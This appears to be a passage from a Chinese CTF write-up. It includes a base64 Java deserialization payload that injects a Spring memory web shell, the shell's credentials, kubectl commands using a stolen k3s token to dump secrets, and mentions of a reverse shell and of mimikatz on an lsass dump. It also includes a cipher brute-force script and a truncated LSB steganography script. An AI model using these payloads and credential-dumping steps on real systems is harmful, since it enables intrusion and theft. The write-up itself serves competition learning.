EV1WXZ4bHpsMExwc1Q1OUNOQXlvbnpxRUhONnBVUHFja3VWVjJySVQzVlhSb09NU1FEMUNhcHFKL1dNUE5HbTYxdHpWZUtaZ0xkN3lDZk82OWpLYVhLZS9YTW4zNHJtTkdMR09oMkdYQWpGYzV1VlEwRlB5dUR5ODBsakd5MTduNU9KZkIzOC9ncFJaUFdRYi83c1YvSmNDdlpERFFRSmJHb0t3RkYzdERlYllXNXRBMzRBYnU2dlM4RmRNUTVybEJpZ2lydkUzaE5JKzBQdFpFUFg2ai9GcksvSitxU3JnQ3ozRWxsSWVGY0EyUWpWN3Q0cCtkMVRTV054ODdyVVVUQVpXZ0hSSU5oVUxyRS9tTlpZVmlvamdySm1kRVlSbmYwekppVmxNNVU3UlF6UFk4akJNdDdvSk56VHdyNTQ5Ylc5eWxYTTg2aTExMHBicXBVTXhWRW1SdWVvbzhpbWwrTGxPUlp4U1hsN1Z5VXZXOWRiU3RqcG5VeFZnTklyR00zUktxQm1NMHQ1TjdjZEoxOFR4Qnl2M1l4SnpZeXF6b1loYjBNQmNPTXVJU25ZMUVjRFk0bWxTczJiU0VFRkxIVml4U2V4NXlWamg3NjdGS3VKMStja2g0bUVVU3hZUENtMFd4UkhhUk90VVpCbEVjd0FyWlFkUnYxU3I0R0prYS9GWnlVTjd0b0h3MEYrWEx4MFo1c1FQWXJ0RW9iN0wvaUZvTnNTNGVoWFZwTHVzSXJJZDRoeENYMVZySE9yMkZTVDRjOFlNOFBVelRiK0xlemFRN1NzcGJTSGtiRVR5Q25iaWR2KzdrNmc3K3Z5c0g4Ukt4d0VGOG5ZUHVUZ1RWbm9lY2xjN2VOVmliUmZ3b0ViZno5ZzRpWHAyTGVMMlR0NXNjeEtzbDR1cjMySWo3UkRBN2g2OVdSUUVzN0JQbDV4dWtQSDVBVFdIcGU0RWFZNFcwYXlwN3lIeFcxd0lJVVNHdEU2SC9Bek5tdWs4UEZ3QUEMAGMAZAwAdQB2DACGAHYMAJAAkQcBKgwBKwEsDAEtAS4BADxvcmcuc3ByaW5nZnJhbWV3b3JrLndlYi5jb250ZXh0LnJlcXVlc3QuUmVxdWVzdENvbnRleHRIb2xkZXIMAS8BMAEAFGdldFJlcXVlc3RBdHRyaWJ1dGVzDAC5AK4BAApnZXRSZXF1ZXN0AQAKZ2V0U2Vzc2lvbgEAEWdldFNlcnZsZXRDb250ZXh0AQBCb3JnLnNwcmluZ2ZyYW1ld29yay53ZWIuY29udGV4dC5zdXBwb3J0LldlYkFwcGxpY2F0aW9uQ29udGV4dFV0aWxzAQAYZ2V0V2ViQXBwbGljYXRpb25Db250ZXh0AQAPamF2YS9sYW5nL0NsYXNzAQAcamF2YXguc2VydmxldC5TZXJ2bGV0Q29udGV4dAEAEGphdmEvbGFuZy9PYmplY3QMALkAvAEAE2phdmEvbGFuZy9FeGNlcHRpb24BADFvcmcuc3ByaW5nZnJhbWV3b3JrLmNvbnRleHQuc3VwcG9ydC5MaXZlQmVhbnNWaWV3DAExAHYMAK0ArgEAF2phdmEvdXRpbC9MaW5rZWRIYXNoU2V0DABxATIHATMMATQAdgEANW9yZy5zcHJpbmdmcmFtZXdvcmsud2ViLmNvbnRleHQuV2ViQXBwbGljYXRpb25Db250ZXh0DAE1ATYMATcBOAwAXwBZDABgAFkMAJcAmAwAngCfAQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyBwE5DAE6AIwMATsBPAcBKQwBPQE+DAE/AUAMAUEBQgEAE2phdmEvbGFuZy9UaHJvd2FibGUBAAdnZXRCZWFuAQAQamF2YS9sYW5nL1N0cmluZwEAHHJlcXVlc3RNYXBwaW5nSGFuZGxlck1hcHBpbmcBABNqYXZhL3V0aWwvQXJyYXlMaXN0DAFDAUQBABZzdW4ubWlzYy5CQVNFNjREZWNvZGVyDAFFATABAAxkZWNvZGVCdWZmZXIMAUYBPAEAEGphdmEudXRpbC5CYXNlNjQBAApnZXREZWNvZGVyAQAGZGVjb2RlAQAdamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW0BABxqYXZhL2lvL0J5dGVBcnJheUlucHV0U3RyZWFtDABjAUcBAB1qYXZhL3V0aWwvemlwL0daSVBJbnB1dFN0cmVhbQwAYwFIDAFJAUoMAUsBTAwBTQFODACzALQHAU8MAVABUQwBUgFTAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDAFUATYMAGMBVQwBVgFXDAFYAFkMAVkBRAwBWgFbAQAfamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbgEAIGphdmEvbGFuZy9JbGxlZ2FsQWNjZXNzRXhjZXB0aW9uAQAaamF2YS9sYW5nL1J1bnRpbWVFeGNlcHRpb24MAVwAWQEAFmNvbS9leGFtcGxlL2V4cC9BdnhlcmIBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9pby9JT0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAIGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uAQAramF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvblRhcmdldEV4Y2VwdGlvbgEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEAEGphdmEvbGFuZy9UaHJlYWQBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAJbG9hZENsYXNzAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEAC25ld0luc3RhbmNlAQAWKClMamF2YS91dGlsL0l0ZXJhdG9yOwEAEmphdmEvdXRpbC9JdGVyYXRvcgEABG5leHQBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBABBpc0Fzc2lnbmFibGVGcm9tAQAUKExqYXZhL2xhbmcvQ2xhc3M7KVoBABFqYXZhL2xhbmcvSW50ZWdlcgEABFRZUEUBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAB3ZhbHVlT2YBABYoSSlMamF2YS9sYW5nL0ludGVnZXI7AQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQADY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wBJWSu3AEu/AAEACQAVABYASQAEAFsAAAAmAAkAAACOAAUAkAAJAJIADwCTABQAlAAWAJUAFwCWABwAlwAfAJoAXAAAADQABQAPAAcAsQCyAAMAFwAFAJsAtQADAAAAKACvAGYAAAAAACgAsACdAAEABQAjAIsAjAACAJUAAAAMAAEABQAjAIsAtgACAH8AAAANAAP8AAUHALdQBwC4CABhAAAABAABAEkAbwAAAAkCAK8AAACwAAAAKAC5AK4AAwBaAAAAQgAEAAIAAAAOKisDvQATA70AFbgAFrAAAAACAFsAAAAGAAEAAACeAFwAAAAWAAIAAAAOALoAZgAAAAAADgC7AJ0AAQBhAAAACAADAFAAUgCFAG8AAAAJAgC6AAAAuwAAACkAuQC8AAMAWgAAAhcAAwAJAAAAyirBABOZAAoqwAATpwAHKrYAIDoEAToFGQQ6BhkFxwBkGQbGAF8sxwBDGQa2AEw6BwM2CBUIGQe+ogAuGQcVCDK2AE0rtgBOmQAZGQcVCDK2AE++mgANGQcVCDI6BacACYQIAaf/0KcADBkGKyy2ACo6Baf/qToHGQa2AEo6Bqf/nRkFxwAMuwBQWSu3AFG/GQUEtgArKsEAE5kAGhkFAS22AC2wOge7AFNZGQe2AFS3AFW/GQUqLbYALbA6B7sAU1kZB7YAVLcAVb8AAwAlAHIAdQBQAJwAowCkAFIAswC6ALsAUgADAFsAAABuABsAAACiABQAowAXAKQAGwCmACUAqAApAKkAMACrADsArABWAK0AXQCuAGAAqwBmALEAaQCyAHIAtgB1ALQAdwC1AH4AtgCBALkAhgC6AI8AvACVAL0AnAC/AKQAwACmAMEAswDFALsAxgC9AMcAXAAAAHoADAAzADMAvQCpAAgAMAA2AL4AvwAHAHcABwDAAMEABwCmAA0AwgDDAAcAvQANAMQAwwAHAAAAygCvAGYAAAAAAMoAuwCdAAEAAADKAMUAxgACAAAAygDHAMgAAwAUALYAiwCMAAQAFwCzAMkAigAFABsArwDKAIwABgB/AAAALwAODkMHALf+AAgHALcHAMsHALf9ABcHAMwBLPkABQIIQgcAzQsNVAcAzg5HBwDOAGEAAAAIAAMAUACFAFIAbwAAABEEAK8AAAC7AAAAxQAAAMcAAAABAM8AAAACANBwdAAEYWFhYXB3AQB4dXIAEltMamF2YS5sYW5nLkNsYXNzO6sW167LzVqZAgAAeHAAAAABdnIAHWphdmF4LnhtbC50cmFuc2Zvcm0uVGVtcGxhdGVzAAAAAAAAAAAAAAB4cHcEAAAAA3ZyADdjb20uc3VuLm9yZy5hcGFjaGUueGFsYW4uaW50ZXJuYWwueHNsdGMudHJheC5UckFYRmlsdGVyAAAAAAAAAAAAAAB4cHQAA2Jhcng="}
requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

加密器: JAVA_AES_BASE64
地址: /shellAacw125
密码: Hcreljak
密钥: Vazwoxyqvohfnbgcwq
请求头: Agent:aaa
  • 根据app.jar源代码发现内网有k3s的服务,从lib.so中获取token,发现具有查看secrets的权限
export KUBE="eyJhbGciOiJSUzI1NiIsImtpZCI6IlZvTVB3eDlfNm0wSzljbnhXRUNZU3JWa1VQRjY3Z05xaTRKU2xwUzBZNXcifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImN0Zi1zZXJ2aWNlYWNjb3VudC1zZWNyZXQiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiY3RmLXNlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiYjEwNWQ5ODctZmQ1Zi00MjZiLTgxODgtOWI3MWNjZTkwYmRhIiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6Y3RmLXNlcnZpY2VhY2NvdW50In0.DAaw3fHoGdY8Kl4BHnGeuQaAHJQpLdbB-jsatlLVfJM60N6Ftx0TyXlGDCsgm2e0u25xnWudQqZeneu1H1EaC0QQDzliPjG5dVhbXYIciM3dOyb8cap5wy5bPAgsAE1wPs_ZxAT6r7XQjWfYkqY6waI6R4_Hdrb98Vzwo4O6EYqNQAX8lVlGtAoIbkZ7U72z-zDR6rf_IHetdRs2JYpzG9kScbZLkWGHelY18dCXZHW_FfKqw1yh9zLUf8mh3PwXIeruUOp2oznVazT-qVnxaMOhLKF-4zqEXPbQVgoZh8mT6DNXj5GCBDex4_Uptj-dYJtMzSNC8qyenAeb3tg3Sg"
kubectl --token=$KUBE --server=https://xxx.xxx.xx.xxx:6443 --insecure-skip-tls-verify=true auth can-i --list -n default
kubectl --token=$KUBE --server=https://xxx.xxx.xx.xxx:6443 --insecure-skip-tls-verify=true get secrets -o yaml -n default
apiVersion: v1
items:
- apiVersion: v1
  data:
    password: NWU5ZDgxODktNWMxNi00NTg3LTkyNjAtNGU2YjBjODZmMWVi
    username: a2V5
  kind: Secret
  metadata:
    annotations:
      kubectl.kubernetes.io/last-applied-configuration: |
        {"apiVersion":"v1","data":{"password":"NWU5ZDgxODktNWMxNi00NTg3LTkyNjAtNGU2YjBjODZmMWVi","username":"a2V5"},"kind":"Secret","metadata":{"annotations":{},"name":"key-secret","namespace":"default"},"type":"Opaque"}
    creationTimestamp: "2023-08-18T19:01:04Z"
    managedFields:
    - apiVersion: v1
      fieldsType: FieldsV1
      fieldsV1:
        f:data:
          .: {}
          f:password: {}
          f:username: {}
        f:metadata:
          f:annotations:
            .: {}
            f:kubectl.kubernetes.io/last-applied-configuration: {}
        f:type: {}
      manager: kubectl-client-side-apply
      operation: Update
      time: "2023-08-18T19:01:04Z"
    name: key-secret
    namespace: default
    resourceVersion: "31990"
    uid: 41eca5bb-3afb-49cd-86ef-9b0e482929d2
  type: Opaque
- apiVersion: v1
  data:
    ca.crt: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUJkekNDQVIyZ0F3SUJBZ0lCQURBS0JnZ3Foa2pPUFFRREFqQWpNU0V3SHdZRFZRUUREQmhyTTNNdGMyVnkKZG1WeUxXTmhRREUyT1RJek5EWTFNamd3SGhjTk1qTXdPREU0TURneE5USTRXaGNOTXpNd09ERTFNRGd4TlRJNApXakFqTVNFd0h3WURWUVFEREJock0zTXRjMlZ5ZG1WeUxXTmhRREUyT1RJek5EWTFNamd3V1RBVEJnY3Foa2pPClBRSUJCZ2dxaGtqT1BRTUJCd05DQUFTbWZBdCtJTDdTSEdTT0VCQjB6djBhZThhOHBZaVVRempQWG5HUWt6SXoKQnJvdmNTK0s4c1o2NjRwaExBR2IzMmdrV1RndzdVSlArL3IyUUJzekV5Q09vMEl3UURBT0JnTlZIUThCQWY4RQpCQU1DQXFRd0R3WURWUjBUQVFIL0JBVXdBd0VCL3pBZEJnTlZIUTRFRmdRVXMvZDRrbytkemtCV0h6cVdSY3FCCnhMMkVaaHd3Q2dZSUtvWkl6ajBFQXdJRFNBQXdSUUlnTS91NHFIcU93Z2drenhuejV1cG80dnlJSzQvQTBDcWcKMGVoTGxKRUQwNG9DSVFDdXNLcGVncm5IKy9IeWxYSXVMV3liZGNXbjZZMTlXOXR2MXdSUktSNDBzdz09Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K
    namespace: ZGVmYXVsdA==
    token: ZXlKaGJHY2lPaUpTVXpJMU5pSXNJbXRwWkNJNklsWnZUVkIzZURsZk5tMHdTemxqYm5oWFJVTlpVM0pXYTFWUVJqWTNaMDV4YVRSS1UyeHdVekJaTlhjaWZRLmV5SnBjM01pT2lKcmRXSmxjbTVsZEdWekwzTmxjblpwWTJWaFkyTnZkVzUwSWl3aWEzVmlaWEp1WlhSbGN5NXBieTl6WlhKMmFXTmxZV05qYjNWdWRDOXVZVzFsYzNCaFkyVWlPaUprWldaaGRXeDBJaXdpYTNWaVpYSnVaWFJsY3k1cGJ5OXpaWEoyYVdObFlXTmpiM1Z1ZEM5elpXTnlaWFF1Ym1GdFpTSTZJbU4wWmkxelpYSjJhV05sWVdOamIzVnVkQzF6WldOeVpYUWlMQ0pyZFdKbGNtNWxkR1Z6TG1sdkwzTmxjblpwWTJWaFkyTnZkVzUwTDNObGNuWnBZMlV0WVdOamIzVnVkQzV1WVcxbElqb2lZM1JtTFhObGNuWnBZMlZoWTJOdmRXNTBJaXdpYTNWaVpYSnVaWFJsY3k1cGJ5OXpaWEoyYVdObFlXTmpiM1Z1ZEM5elpYSjJhV05sTFdGalkyOTFiblF1ZFdsa0lqb2lZakV3TldRNU9EY3RabVExWmkwME1qWmlMVGd4T0RndE9XSTNNV05qWlRrd1ltUmhJaXdpYzNWaUlqb2ljM2x6ZEdWdE9uTmxjblpwWTJWaFkyTnZkVzUwT21SbFptRjFiSFE2WTNSbUxYTmxjblpwWTJWaFkyTnZkVzUwSW4wLkRBYXczZkhvR2RZOEtsNEJIbkdldVFhQUhKUXBMZGJCLWpzYXRsTFZmSk02ME42RnR4MFR5WGxHRENzZ20yZTB1MjV4bld1ZFFxWmVuZXUxSDFFYUMwUVFEemxpUGpHNWRWaGJYWUljaU0zZE95YjhjYXA1d3k1YlBBZ3NBRTF3UHNfWnhBVDZyN1hRaldmWWtxWTZ3YUk2UjRfSGRyYjk4Vnp3bzRPNkVZcU5RQVg4bFZsR3RBb0lia1o3VTcyei16RFI2cmZfSUhldGRSczJKWXB6RzlrU2NiWkxrV0dIZWxZMThkQ1haSFdfRmZLcXcxeWg5ekxVZjhtaDNQd1hJZXJ1VU9wMm96blZhelQtcVZueGFNT2hMS0YtNHpxRVhQYlFWZ29aaDhtVDZETlhqNUdDQkRleDRfVXB0ai1kWUp0TXpTTkM4cXllbkFlYjN0ZzNTZw==
  kind: Secret
  metadata:
    annotations:
      kubernetes.io/service-account.name: ctf-serviceaccount
      kubernetes.io/service-account.uid: b105d987-fd5f-426b-8188-9b71cce90bda
    creationTimestamp: "2023-08-18T13:22:29Z"
    labels:
      kubernetes.io/legacy-token-last-used: "2023-08-20"
    managedFields:
    - apiVersion: v1
      fieldsType: FieldsV1
      fieldsV1:
        f:metadata:
          f:annotations:
            .: {}
            f:kubernetes.io/service-account.name: {}
        f:type: {}
      manager: kubectl-create
      operation: Update
      time: "2023-08-18T13:22:29Z"
    - apiVersion: v1
      fieldsType: FieldsV1
      fieldsV1:
        f:data:
          .: {}
          f:ca.crt: {}
          f:namespace: {}
          f:token: {}
        f:metadata:
          f:annotations:
            f:kubernetes.io/service-account.uid: {}
          f:labels:
            .: {}
            f:kubernetes.io/legacy-token-last-used: {}
      manager: k3s
      operation: Update
      time: "2023-08-20T06:36:29Z"
    name: ctf-serviceaccount-secret
    namespace: default
    resourceVersion: "140777"
    uid: bf517b49-e11d-42da-879c-df84513ce55d
  type: kubernetes.io/service-account-token
kind: List
metadata:
  resourceVersion: ""
  selfLink: ""
  • 获取到密码,在web端反弹shell,执行/readflag

Misc

Find me

  • Reddit内容
l recently designed a new encryption method, and l don't think  anyone can decrypt it. If you don't believe me, you can try it out😎😎😎   
        
---> aHR0cHM6Ly91ZmlsZS5pby82NzB1bnN6cA== 

https://wearymeadow.icu/2023/07/31/My-secret-encryption-algorithm/  
需要一个文章解锁密码, hexo-blog-encrypt
  • 在另一个github仓库中得到密码
    • https://github.com/WearyMeadow/autologinbot/blob/master/login.py
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

usernameStr = 'WearyMeadow'
passwordStr = 'P@sSW0rD123$%^'

browser = webdriver.Chrome()
browser.get(('https://accounts.google.com/ServiceLogin?'
             'service=mail&continue=https://mail.google'
             '.com/mail/#identifier'))

# fill in username and hit the next button

username = browser.find_element_by_id('identifierId')
username.send_keys(usernameStr)

nextButton = browser.find_element_by_id('identifierNext')
nextButton.click()

# wait for transition then continue to fill items

password = WebDriverWait(browser, 10).until(
    EC.presence_of_element_located((By.NAME, "password")))

password.send_keys(passwordStr)

signInButton = browser.find_element_by_id('passwordNext')
signInButton.click()
  • 得到加密通讯脚本
import socket
import random
from Crypto.Cipher import AES
from sys import argv

def pad(s):
    return s + b"\0" * (AES.block_size - len(s) % AES.block_size)

def encrypt(message, key):
    seed  = random.randint(0, 11451)
    random.seed(seed)
    encrypted = b''
    for i in range(len(message)):
        encrypted += bytes([message[i] ^ random.randint(0, 255)])
    cipher = AES.new(key, AES.MODE_ECB)
    encrypted = cipher.encrypt(pad(encrypted))
    return encrypted

def decrypt(ciphertext, key):
    # Still working on this...
    pass

def start_server():
    host = b'172.29.64.1'
    port = int(argv[1])
    expected_key = pad(argv[2].encode())

    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind((host, port))
    server_socket.listen(1)
    print('Waiting for incoming connections...')

    client_socket, addr = server_socket.accept()
    print('Connected with', addr)

    handshake_msg = client_socket.recv(1024)
    if handshake_msg == expected_key:
        print('Handshake successful.')
        shared_key = expected_key
        client_socket.sendall(b"Success")
    else:
        print('Handshake failed. Closing connection.')
        client_socket.sendall(b"Failure")
        client_socket.close()
        return

    while True:
        data = client_socket.recv(1024)
        print('Received:', bytes.hex(data))

        message = input('Enter message: ')
        encrypted_message = encrypt(message.encode(), shared_key)
        client_socket.sendall(encrypted_message)

    client_socket.close()
    server_socket.close()

start_server()
import socket
import random
from Crypto.Cipher import AES
from sys import argv

def pad(s):
    return s + b"\0" * (AES.block_size - len(s) % AES.block_size)

def encrypt(message, key):
    seed  = random.randint(0, 11451)
    random.seed(seed)
    encrypted = b''
    for i in range(len(message)):
        encrypted += bytes([message[i] ^ random.randint(0, 255)])
    cipher = AES.new(key, AES.MODE_ECB)
    encrypted = cipher.encrypt(pad(encrypted))
    return encrypted

def decrypt(ciphertext, key):
    # Still working on this...
    pass

def start_client():
    host = argv[1]
    port = int(argv[2])

    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client_socket.connect((host, port))
    print('Connected to server')

    shared_key = pad(input('Enter shared key: ').encode())
    client_socket.sendall(shared_key)
    handshake_result = client_socket.recv(1024)
    if handshake_result == b"Success":
        print('Handshake successful.')
    else:
        print('Handshake failed. Closing connection.')
        client_socket.close()
        return

    while True:
        message = input('Enter message: ')
        encrypted_message = encrypt(message.encode(), shared_key)
        client_socket.sendall(encrypted_message)

        data = client_socket.recv(1024)
        print('Received:', bytes.hex(data))

    client_socket.close()

start_client()
  • 写个爆破脚本得到flag
import random
from string import printable
from Crypto.Cipher import AES

key = bytes([int(i, 16) for i in "6d 79 73 65 63 72 65 74 6b 65 79 00 00 00 00 00".split()])
a = bytes.fromhex("778f6cc13090c6a4f0b51939d784a6b38512f80a92b82bf8225fb8bfed713b2f8eee53dfbe228c7296449d904467a1677c83b9534e2dfcfcbc6f7b08f77f96f2")

cipher = AES.new(key, AES.MODE_ECB)
encrypted = cipher.decrypt(a).strip(b"\x00")
# print(encrypted)
for i in range(11451):
    random.seed(i)
    test = b''
    for _ in encrypted:
        test += bytes([_ ^ random.randint(0, 255)])
    try:
        test = test.decode()
        if all([i in printable for i in test]):
            print(test)
    except:
        pass

Oversharing

  • 导出smb2中的文件,得到lsass.DMP,mimimkatz分析拿到密码,ssh连接

Fantastic terminal

  • strings

Fantasic terminal Rev

  • 本地起docker,根目录存在一个challenge二进制文件,逆向一下
enc=[ 0x5,0x1F, 0x11, 0x06, 0x14, 0x29, 0x20, 0x61]
enc2="$7<57\r&7 ?c<3>\r34&7 \r4'19c<5\r\"33&1:::::::::::::/"
for i in enc:
    print(chr((i)^0x52),end='')
for i in enc2:
    print(chr(ord(i)^0x52),end='')

Steg

Ez_v1deo

  • avi分帧,不同通道均可看到字符,lsb提取
from PIL import Image

for n in range(1,212,5):
    print(n)
    img = Image.open("./1/{}.png".format(n))
    img = img.convert("RGB")
    width,height=img.size
    for i in range(0,width):
        for j in range(0,height):
            tmp = img.getpixel((i,j))
            if tmp[1]&0x1 == 0:
                img.putpixel((i,j),0)
            else:
